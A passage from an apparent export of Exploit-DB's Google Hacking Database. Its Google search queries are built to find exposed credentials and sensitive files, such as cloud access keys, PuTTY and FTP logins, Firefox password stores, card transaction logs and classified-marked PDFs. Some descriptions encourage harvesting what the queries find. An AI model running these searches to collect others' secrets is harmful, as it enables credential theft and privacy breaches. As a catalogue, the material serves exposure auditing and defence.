<textualDescription>People are going to hate me for this :P
Finds Unreal game files, potentially containing admin passwords
Dxtroyer</textualDescription>
<query>&quot;Protocol=unreal&quot; ext:ini -git</query>
<querystring>https://www.google.com/search?q=&quot;Protocol=unreal&quot; ext:ini -git</querystring>
<edb></edb>
<date>2017-06-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>6549</id>
<link>https://www.exploit-db.com/ghdb/6549</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;putty.log&quot; ext:log | ext:cfg | ext:txt</shortDescription>
<textualDescription># Google Dork: &quot;putty.log&quot; ext:log | ext:cfg | ext:txt
# Putty logs containing juicy info.
# Date: 18/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;putty.log&quot; ext:log | ext:cfg | ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;putty.log&quot; ext:log | ext:cfg | ext:txt</querystring>
<edb></edb>
<date>2020-09-18</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6687</id>
<link>https://www.exploit-db.com/ghdb/6687</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;putty.log&quot; ext:log | ext:cfg | ext:txt | ext:sql | ext:env</shortDescription>
<textualDescription>#Exploit Title : Putty logs containing juicy info.
#Google Dork : &quot;putty.log&quot; ext:log | ext:cfg | ext:txt | ext:sql | ext:env
#Date : 18/11/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>&quot;putty.log&quot; ext:log | ext:cfg | ext:txt | ext:sql | ext:env</query>
<querystring>https://www.google.com/search?q=&quot;putty.log&quot; ext:log | ext:cfg | ext:txt | ext:sql | ext:env</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>4592</id>
<link>https://www.exploit-db.com/ghdb/4592</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;QuickDiag&quot; &quot;by g3n-h@ckm@n&quot; ext:txt</shortDescription>
<textualDescription>Finds logs of QuickDiag
--
Dan Peretz</textualDescription>
<query>&quot;QuickDiag&quot; &quot;by g3n-h@ckm@n&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;QuickDiag&quot; &quot;by g3n-h@ckm@n&quot; ext:txt</querystring>
<edb></edb>
<date>2017-10-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4527</id>
<link>https://www.exploit-db.com/ghdb/4527</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;random's system information tool&quot; ext:txt</shortDescription>
<textualDescription>Finds logs from system info stealers
Dxtroyer</textualDescription>
<query>&quot;random's system information tool&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;random's system information tool&quot; ext:txt</querystring>
<edb></edb>
<date>2017-06-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6454</id>
<link>https://www.exploit-db.com/ghdb/6454</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Reflector Dashboard&quot; inurl:/db/index.php/</shortDescription>
<textualDescription># Google Dork: &quot;Reflector Dashboard&quot; inurl:/db/index.php/
# Juicy info about Radio Amateur Dashboards.
# Date: 28/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;Reflector Dashboard&quot; inurl:/db/index.php/</query>
<querystring>https://www.google.com/search?q=&quot;Reflector Dashboard&quot; inurl:/db/index.php/</querystring>
<edb></edb>
<date>2020-07-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>209</id>
<link>https://www.exploit-db.com/ghdb/209</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Request Details&quot; &quot;Control Tree&quot; &quot;Server Variables&quot;</shortDescription>
<textualDescription>These pages contain a great deal of information including path names, session ID's, stack traces, port numbers, ip addresses, and much much more. Attackers can use this information to formulate a very advanced attack against these targets.</textualDescription>
<query>&quot;Request Details&quot; &quot;Control Tree&quot; &quot;Server Variables&quot;</query>
<querystring>https://www.google.com/search?q=%22Request+Details%22+%22Control+Tree%22+%22Server+Variables%22</querystring>
<edb></edb>
<date>2004-05-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>96</id>
<link>https://www.exploit-db.com/ghdb/96</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;robots.txt&quot; &quot;Disallow:&quot; filetype:txt</shortDescription>
<textualDescription>The robots.txt file serves as a set of instructions for web crawlers. The &quot;disallow&quot; tag tells a web crawler where NOT to look, for whatever reason. Hackers will always go to those places first!</textualDescription>
<query>&quot;robots.txt&quot; &quot;Disallow:&quot; filetype:txt</query>
<querystring>https://www.google.com/search?q=%22robots%2Etxt%22+%2B+%22Disallow%3A%22+filetype%3Atxt</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>6247</id>
<link>https://www.exploit-db.com/ghdb/6247</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;root.log&quot; ext:log</shortDescription>
<textualDescription># Google Dork: &quot;root.log&quot; ext:log
# Juicy information and sensitive directories.
# Date: 2020-06-09
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;root.log&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;root.log&quot; ext:log</querystring>
<edb></edb>
<date>2020-06-09</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>174</id>
<link>https://www.exploit-db.com/ghdb/174</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Running in Child mode&quot;</shortDescription>
<textualDescription>This is a gnutella client that was picked up by google. There is a lot of data present including transfer statistics, port numbers, operating system, memory, processor speed, ip addresses, and gnutella client versions.</textualDescription>
<query>&quot;Running in Child mode&quot;</query>
<querystring>https://www.google.com/search?q=%22Running+in+Child+mode%22+</querystring>
<edb></edb>
<date>2004-04-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4454</id>
<link>https://www.exploit-db.com/ghdb/4454</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Scan result of Farbar Recovery Scan Tool&quot; ext:txt</shortDescription>
<textualDescription>Finds logfiles for... Farbar?!? I don't even know. Some cool info, though.
Dxtroyer</textualDescription>
<query>&quot;Scan result of Farbar Recovery Scan Tool&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;Scan result of Farbar Recovery Scan Tool&quot; ext:txt</querystring>
<edb></edb>
<date>2017-05-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>5516</id>
<link>https://www.exploit-db.com/ghdb/5516</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Scanned by Camscanner&quot; filetype:pdf</shortDescription>
<textualDescription># Google Dork: &quot;Scanned by Camscanner&quot; filetype:pdf
# Category: Files Containing Juicy Information
# Author: Surya Teja Masanam
# Date: 10-09-2018
</textualDescription>
<query>&quot;Scanned by Camscanner&quot; filetype:pdf</query>
<querystring>https://www.google.com/search?q=&quot;Scanned by Camscanner&quot; filetype:pdf</querystring>
<edb></edb>
<date>2019-09-10</date>
<author>Surya Teja Masanam</author>
</entry>
<entry>
<id>4469</id>
<link>https://www.exploit-db.com/ghdb/4469</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;screen mode id:&quot; ext:rdp</shortDescription>
<textualDescription>RDP is basically a Windows-sanctioned backdoor. You can use it to access
someones computer remotely. This dork finds files with RDP info and logins!
Dxtroyer</textualDescription>
<query>&quot;screen mode id:&quot; ext:rdp</query>
<querystring>https://www.google.com/search?q=&quot;screen mode id:&quot; ext:rdp</querystring>
<edb></edb>
<date>2017-05-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4482</id>
<link>https://www.exploit-db.com/ghdb/4482</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;SECRET//NOFORN&quot; ext:pdf</shortDescription>
<textualDescription>Finds secret government documents
Dxtroyer</textualDescription>
<query>&quot;SECRET//NOFORN&quot; ext:pdf</query>
<querystring>https://www.google.com/search?q=&quot;SECRET//NOFORN&quot; ext:pdf</querystring>
<edb></edb>
<date>2017-05-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>5945</id>
<link>https://www.exploit-db.com/ghdb/5945</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;SecretAccessKey&quot; OR &quot;AccessKeyId&quot; ext:txt OR ext:cfg -git</shortDescription>
<textualDescription># Google Dork: &quot;SecretAccessKey&quot; OR &quot;AccessKeyId&quot; ext:txt OR ext:cfg -git
# Configuration files containing credentials.
# Date: 23/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;SecretAccessKey&quot; OR &quot;AccessKeyId&quot; ext:txt OR ext:cfg -git</query>
<querystring>https://www.google.com/search?q=&quot;SecretAccessKey&quot; OR &quot;AccessKeyId&quot; ext:txt OR ext:cfg -git</querystring>
<edb></edb>
<date>2020-04-23</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6683</id>
<link>https://www.exploit-db.com/ghdb/6683</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;secret_key_base:&quot; ext:exs | ext:txt | ext:env | ext:cfg</shortDescription>
<textualDescription># Google Dork: &quot;secret_key_base:&quot; ext:exs | ext:txt | ext:env | ext:cfg
# Sensitive directories containing juicy information.
# Date: 12/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;secret_key_base:&quot; ext:exs | ext:txt | ext:env | ext:cfg</query>
<querystring>https://www.google.com/search?q=&quot;secret_key_base:&quot; ext:exs | ext:txt | ext:env | ext:cfg</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4473</id>
<link>https://www.exploit-db.com/ghdb/4473</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Section&quot; inurl:&quot;xorg.conf&quot; ext:conf -wiki</shortDescription>
<textualDescription>Config files for Xorg X, containing victim's computer information
Dxtroyer</textualDescription>
<query>&quot;Section&quot; inurl:&quot;xorg.conf&quot; ext:conf -wiki</query>
<querystring>https://www.google.com/search?q=&quot;Section&quot; inurl:&quot;xorg.conf&quot; ext:conf -wiki</querystring>
<edb></edb>
<date>2017-05-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4437</id>
<link>https://www.exploit-db.com/ghdb/4437</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;SERVER_ADDR&quot; &quot;SERVER_PORT&quot; &quot;SERVER_NAME&quot; ext:log</shortDescription>
<textualDescription>Finds logs with server information!
Dxtroyer</textualDescription>
<query>&quot;SERVER_ADDR&quot; &quot;SERVER_PORT&quot; &quot;SERVER_NAME&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;SERVER_ADDR&quot; &quot;SERVER_PORT&quot; &quot;SERVER_NAME&quot; ext:log</querystring>
<edb></edb>
<date>2017-04-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>343</id>
<link>https://www.exploit-db.com/ghdb/343</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;sets mode: +p&quot;</shortDescription>
<textualDescription>This search reveals private channels on IRC as revealed by IRC chat logs.</textualDescription>
<query>&quot;sets mode: +p&quot;</query>
<querystring>https://www.google.com/search?q=%22sets+mode:+%2Bp%22&amp;oe=UTF-8</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>345</id>
<link>https://www.exploit-db.com/ghdb/345</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;sets mode: +s&quot;</shortDescription>
<textualDescription>This search reveals secret channels on IRC as revealed by IRC chat logs.</textualDescription>
<query>&quot;sets mode: +s&quot;</query>
<querystring>https://www.google.com/search?q=%22sets+mode:+%2Bs%22&amp;oe=UTF-8</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5970</id>
<link>https://www.exploit-db.com/ghdb/5970</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;settings.ini&quot; intext:&quot;fbconnectkey =&quot; intext:&quot;msverify =&quot;</shortDescription>
<textualDescription># Google Dork: &quot;settings.ini&quot; intext:&quot;fbconnectkey =&quot; intext:&quot;msverify =&quot;
# Juicy information located into settings.ini files.
# Date: 30/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;settings.ini&quot; intext:&quot;fbconnectkey =&quot; intext:&quot;msverify =&quot;</query>
<querystring>https://www.google.com/search?q=&quot;settings.ini&quot; intext:&quot;fbconnectkey =&quot; intext:&quot;msverify =&quot;</querystring>
<edb></edb>
<date>2020-04-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4026</id>
<link>https://www.exploit-db.com/ghdb/4026</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;signons.sqlite&quot; intitle:&quot;index of&quot;</shortDescription>
<textualDescription>&quot;signons.sqlite&quot; intitle:&quot;index of&quot;
This dork finds firefox profiles and other softwares that use the similar
format that you can grab and put in your own firefox or other installation
and reveal all passwords saved, history, bookmarks, saved cookies and
pretty much everything! When you get hacked using this method it feels like
you are getting hacked by a whole team.
by _sNapper
--
&quot;The answer to every problem is One.&quot; -- Myself
--
&quot;Life is like war, for the most part--planning it is useless.&quot; -- Myself</textualDescription>
<query>&quot;signons.sqlite&quot; intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=&quot;signons.sqlite&quot; intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2015-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>5041</id>
<link>https://www.exploit-db.com/ghdb/5041</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;site:ghostbin.com &quot; / &quot; &quot;</shortDescription>
<textualDescription>Find recently created documents and pastes for GhostBin.com. If nothing
comes up, click &quot;*repeat the search with the omitted results included*.&quot;
~ CrimsonTorso
</textualDescription>
<query>&quot;site:ghostbin.com &quot; / &quot; &quot;</query>
<querystring>https://www.google.com/search?q=&quot;site:ghostbin.com &quot; / &quot; &quot;</querystring>
<edb></edb>
<date>2018-11-28</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>5042</id>
<link>https://www.exploit-db.com/ghdb/5042</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;site:hastebin.com &quot; / &quot; &quot;</shortDescription>
<textualDescription>Find recently created documents and pastes for Hastebin.com. If nothing
comes up, click &quot;*repeat the search with the omitted results included*.&quot;
~ CrimsonTorso
</textualDescription>
<query>&quot;site:hastebin.com &quot; / &quot; &quot;</query>
<querystring>https://www.google.com/search?q=&quot;site:hastebin.com &quot; / &quot; &quot;</querystring>
<edb></edb>
<date>2018-11-28</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>4659</id>
<link>https://www.exploit-db.com/ghdb/4659</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;SiteBar Bookmark Manager&quot; inurl:index.php?w=</shortDescription>
<textualDescription>Dashboards of SiteBar.
Enjoy healthy!!!.
Dork by Rookit_Pentester.
</textualDescription>
<query>&quot;SiteBar Bookmark Manager&quot; inurl:index.php?w=</query>
<querystring>https://www.google.com/search?q=&quot;SiteBar Bookmark Manager&quot; inurl:index.php?w=</querystring>
<edb></edb>
<date>2018-01-22</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>4631</id>
<link>https://www.exploit-db.com/ghdb/4631</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Start of NVIDIA bug report log file&quot; ext:log</shortDescription>
<textualDescription>Finds NVIDIA bug reports, containing juicy info about the computer,
including settings
Dxtroyer
</textualDescription>
<query>&quot;Start of NVIDIA bug report log file&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;Start of NVIDIA bug report log file&quot; ext:log</querystring>
<edb></edb>
<date>2017-12-07</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>4517</id>
<link>https://www.exploit-db.com/ghdb/4517</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;START securepay&quot; ext:log</shortDescription>
<textualDescription>Finds transaction logs (sometimes containing credit card numbers and other
juicy info!)
Dxtroyer</textualDescription>
<query>&quot;START securepay&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;START securepay&quot; ext:log</querystring>
<edb></edb>
<date>2017-06-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4162</id>
<link>https://www.exploit-db.com/ghdb/4162</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Stats generated by pisg v0.73&quot;</shortDescription>
<textualDescription>Dork with Stats for irc channels.
Discovered by Rootkit Pentester.</textualDescription>
<query>&quot;Stats generated by pisg v0.73&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Stats generated by pisg v0.73&quot;</querystring>
<edb></edb>
<date>2015-12-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>8287</id>
<link>https://www.exploit-db.com/ghdb/8287</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;structure&quot; + ext:sql</shortDescription>
<textualDescription># Google Dork: &quot;structure&quot; + ext:sql
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit chum1ng0</textualDescription>
<query>&quot;structure&quot; + ext:sql</query>
<querystring>https://www.google.com/search?q=&quot;structure&quot; + ext:sql</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>chum1ng0</author>
</entry>
<entry>
<id>140</id>
<link>https://www.exploit-db.com/ghdb/140</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Thank you for your order&quot; +receipt</shortDescription>
<textualDescription>After placing an order via the web, many sites provide a page containing the phrase &quot;Thank you for your order&quot; and provide a receipt for future reference. At the very least, these pages can provide insight into the structure of a web-based shop.</textualDescription>
<query>&quot;Thank you for your order&quot; +receipt</query>
<querystring>https://www.google.com/search?q=%22Thank+you+for+your+order%22+%2Breceipt</querystring>
<edb></edb>
<date>2004-03-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>6719</id>
<link>https://www.exploit-db.com/ghdb/6719</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;The SQL command completed successfully.&quot; ext:txt | ext:log</shortDescription>
<textualDescription># Google Dork: &quot;The SQL command completed successfully.&quot; ext:txt | ext:log
# Files containing juicy information.
# Date: 3/12/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;The SQL command completed successfully.&quot; ext:txt | ext:log</query>
<querystring>https://www.google.com/search?q=&quot;The SQL command completed successfully.&quot; ext:txt | ext:log</querystring>
<edb></edb>
<date>2020-12-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>175</id>
<link>https://www.exploit-db.com/ghdb/175</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;This is a Shareaza Node&quot;</shortDescription>
<textualDescription>These pages are from Shareaza client programs. Various data is displayed including client version, ip address, listening ports and uptime.</textualDescription>
<query>&quot;This is a Shareaza Node&quot;</query>
<querystring>https://www.google.com/search?q=%22This+is+a+Shareaza+Node%22</querystring>
<edb></edb>
<date>2004-04-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>40</id>
<link>https://www.exploit-db.com/ghdb/40</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;This report was generated by WebLog&quot;</shortDescription>
<textualDescription>These are weblog-generated statistics for web sites... A roadmap of files, referrers, errors, statistics... yummy... a schmorgasbord! =P</textualDescription>
<query>&quot;This report was generated by WebLog&quot;</query>
<querystring>https://www.google.com/search?q=%22This+report+was+generated+by+WebLog%22</querystring>
<edb></edb>
<date>2003-06-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4560</id>
<link>https://www.exploit-db.com/ghdb/4560</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;TX_start&quot; &quot;card_name&quot; ext:log</shortDescription>
<textualDescription>Finds transaction logs from stores, containing juicy credit/debit card info.
Dxtroyer
</textualDescription>
<query>&quot;TX_start&quot; &quot;card_name&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;TX_start&quot; &quot;card_name&quot; ext:log</querystring>
<edb></edb>
<date>2017-07-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>6592</id>
<link>https://www.exploit-db.com/ghdb/6592</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;UV9 Error (1.0)&quot;</shortDescription>
<textualDescription>Find error pages referring to the E-Vision Web-app. Can sometimes
contain juicy information.
- Strontium
</textualDescription>
<query>&quot;UV9 Error (1.0)&quot;</query>
<querystring>https://www.google.com/search?q=&quot;UV9 Error (1.0)&quot;</querystring>
<edb></edb>
<date>2020-10-05</date>
<author>Strontium</author>
</entry>
<entry>
<id>4901</id>
<link>https://www.exploit-db.com/ghdb/4901</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;var miner=new CryptoLoot.Anonymous&quot; intext:CryptoLoot.Anonymous</shortDescription>
<textualDescription>This is a dork for search sites running Crypto loot miner
Dork : &quot;var miner=new CryptoLoot.Anonymous&quot; intext:CryptoLoot.Anonymous
SMII Mondher
</textualDescription>
<query>&quot;var miner=new CryptoLoot.Anonymous&quot; intext:CryptoLoot.Anonymous</query>
<querystring>https://www.google.com/search?q=&quot;var miner=new CryptoLoot.Anonymous&quot; intext:CryptoLoot.Anonymous</querystring>
<edb></edb>
<date>2018-08-06</date>
<author>SMII Mondher</author>
</entry>
<entry>
<id>7412</id>
<link>https://www.exploit-db.com/ghdb/7412</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Warehouse Management System&quot; Ext:pdf site:.gov</shortDescription>
<textualDescription># Google Dork: &quot;Warehouse Management System&quot; Ext:pdf site:.gov
# Files Containing Juicy Info
# Date:09/10/2021
# Exploit Author: Tyler Draughn</textualDescription>
<query>&quot;Warehouse Management System&quot; Ext:pdf site:.gov</query>
<querystring>https://www.google.com/search?q=&quot;Warehouse Management System&quot; Ext:pdf site:.gov</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Tyler Draughn</author>
</entry>
<entry>
<id>4500</id>
<link>https://www.exploit-db.com/ghdb/4500</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;WEB Browser Password Recovery&quot; ext:txt</shortDescription>
<textualDescription>Description: Various stealers logs
Dork: &quot;WEB Browser Password Recovery&quot; ext:txt
Author: scumsec</textualDescription>
<query>&quot;WEB Browser Password Recovery&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;WEB Browser Password Recovery&quot; ext:txt</querystring>
<edb></edb>
<date>2017-05-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4550</id>
<link>https://www.exploit-db.com/ghdb/4550</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;You're successfully running JSON Server&quot;</shortDescription>
<textualDescription>*Google Dork :- &quot;You're successfully running JSON Server&quot;*
*You can browse through files (username+password)*
--
NEAM :- Helmi</textualDescription>
<query>&quot;You're successfully running JSON Server&quot;</query>
<querystring>https://www.google.com/search?q=&quot;You're successfully running JSON Server&quot;</querystring>
<edb></edb>
<date>2017-07-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4459</id>
<link>https://www.exploit-db.com/ghdb/4459</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;[dirs]&quot; inurl:&quot;mirc.ini&quot; -git</shortDescription>
<textualDescription>Finds mIRC configuration files
Dxtroyer</textualDescription>
<query>&quot;[dirs]&quot; inurl:&quot;mirc.ini&quot; -git</query>
<querystring>https://www.google.com/search?q=&quot;[dirs]&quot; inurl:&quot;mirc.ini&quot; -git</querystring>
<edb></edb>
<date>2017-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>4528</id>
<link>https://www.exploit-db.com/ghdb/4528</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;[FFFTP]&quot; ext:ini</shortDescription>
<textualDescription>Finds files with FTP logins, server info, and more!
Dxtroyer</textualDescription>
<query>&quot;[FFFTP]&quot; ext:ini</query>
<querystring>https://www.google.com/search?q=&quot;[FFFTP]&quot; ext:ini</querystring>
<edb></edb>
<date>2017-06-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>4990</id>
<link>https://www.exploit-db.com/ghdb/4990</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions]&quot; ext:reg</shortDescription>
<textualDescription>Finds PuTTY session configs, sometimes containing plaintext credentials
Dxtroyer
</textualDescription>
<query>&quot;[HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessions]&quot; ext:reg</query>
<querystring>https://www.google.com/search?q=&quot;[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions]&quot; ext:reg</querystring>
<edb></edb>
<date>2018-10-17</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>4346</id>
<link>https://www.exploit-db.com/ghdb/4346</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;[HKEY_CURRENT_USER\Software\sota\FFFTP]&quot; filetype:reg</shortDescription>
<textualDescription>This finds some files with juicy information about Windows servers.
Dork: &quot;[HKEY_CURRENT_USER\Software\sota\FFFTP]&quot; filetype:reg
-Gee</textualDescription>
<query>&quot;[HKEY_CURRENT_USER\Software\sota\FFFTP]&quot; filetype:reg</query>
<querystring>https://www.google.com/search?q=&quot;[HKEY_CURRENT_USER\Software\sota\FFFTP]&quot; filetype:reg</querystring>
<edb></edb>
<date>2016-10-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>4673</id>
<link>https://www.exploit-db.com/ghdb/4673</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;[LocalizedFileNames]&quot; inurl:&quot;desktop.ini&quot; ext:ini -git -wiki</shortDescription>
<textualDescription>Finds desktop.ini files which have lists of shortcuts on the desktop. Often
different software, including insecure software, creates desktop shortcuts.
You can use this to find different software running on the server.
Dxtroyer
</textualDescription>
<query>&quot;[LocalizedFileNames]&quot; inurl:&quot;desktop.ini&quot; ext:ini -git -wiki</query>
<querystring>https://www.google.com/search?q=&quot;[LocalizedFileNames]&quot; inurl:&quot;desktop.ini&quot; ext:ini -git -wiki</querystring>
<edb></edb>
<date>2018-02-14</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>4449</id>
<link>https://www.exploit-db.com/ghdb/4449</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;[PHPSESSID]&quot; ext:log</shortDescription>
<textualDescription>Looks for logs with session ID's generated by PHP
Dxtroyer</textualDescription>
<query>&quot;[PHPSESSID]&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;[PHPSESSID]&quot; ext:log</querystring>
<edb></edb>
<date>2017-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>4674</id>
<link>https://www.exploit-db.com/ghdb/4674</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;[Tera Term]&quot; inurl:&quot;teraterm.ini&quot; ext:ini -git</shortDescription>
<textualDescription>Finds Tera Term configuration files, containing juicy information about the
SSH server
Dxtroyer
</textualDescription>
<query>&quot;[Tera Term]&quot; inurl:&quot;teraterm.ini&quot; ext:ini -git</query>
<querystring>https://www.google.com/search?q=&quot;[Tera Term]&quot; inurl:&quot;teraterm.ini&quot; ext:ini -git</querystring>
<edb></edb>
<date>2018-02-14</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>7869</id>
<link>https://www.exploit-db.com/ghdb/7869</link>
<category>Files Containing Juicy Info</category>
<shortDescription># Description: site:gov.in filetype:xlsx &quot;password&quot;</shortDescription>
<textualDescription># Description: site:gov.in filetype:xlsx &quot;password&quot;
# Files Containing Juicy Info
# Author : Mangesh Pandhare
# Date : 12/01/2022
# Sensitive directories of SSO id's and passwords</textualDescription>
<query># Description: site:gov.in filetype:xlsx &quot;password&quot;</query>
<querystring>https://www.google.com/search?q=# Description: site:gov.in filetype:xlsx &quot;password&quot;</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Mangesh Pandhare</author>
</entry>
<entry>
<id>7338</id>
<link>https://www.exploit-db.com/ghdb/7338</link>
<category>Files Containing Juicy Info</category>
<shortDescription># Exploit Title: [SF Dork]</shortDescription>
<textualDescription># Google Dork: # Exploit Title: [SF Dork]
# Files Containing Juicy Info
# Date:29/09/2021
# Exploit Author: Teddy</textualDescription>
<query># Exploit Title: [SF Dork]</query>
<querystring>https://www.google.com/search?q=# Exploit Title: [SF Dork]</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Teddy</author>
</entry>
<entry>
<id>8064</id>
<link>https://www.exploit-db.com/ghdb/8064</link>
<category>Files Containing Juicy Info</category>
<shortDescription># Google Dork: intitle:&quot;index of&quot; &quot;admin&quot; &quot;cgi-bin&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;admin&quot; &quot;cgi-bin&quot;
# Files Containing Juicy Info
# Date: 2/12/2022
# Exploit Author: Umandon Ardaw</textualDescription>
<query># Google Dork: intitle:&quot;index of&quot; &quot;admin&quot; &quot;cgi-bin&quot;</query>
<querystring>https://www.google.com/search?q=# Google Dork: intitle:&quot;index of&quot; &quot;admin&quot; &quot;cgi-bin&quot;</querystring>
<edb></edb>
<date>2023-02-15</date>
<author>Umandon Ardaw</author>
</entry>
<entry>
<id>6516</id>
<link>https://www.exploit-db.com/ghdb/6516</link>
<category>Files Containing Juicy Info</category>
<shortDescription>'AUTH_SALT' | 'SECURE_AUTH_SALT' | 'LOGGED_IN_SALT' | 'NONCE_SALT' ext:txt | ext:cfg | ext:env | ext:ini</shortDescription>
<textualDescription># Google Dork: 'AUTH_SALT' | 'SECURE_AUTH_SALT' | 'LOGGED_IN_SALT' | 'NONCE_SALT' ext:txt | ext:cfg | ext:env | ext:ini
# MySQL database usernames and passwords, and SALT values....
# Date: 1/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
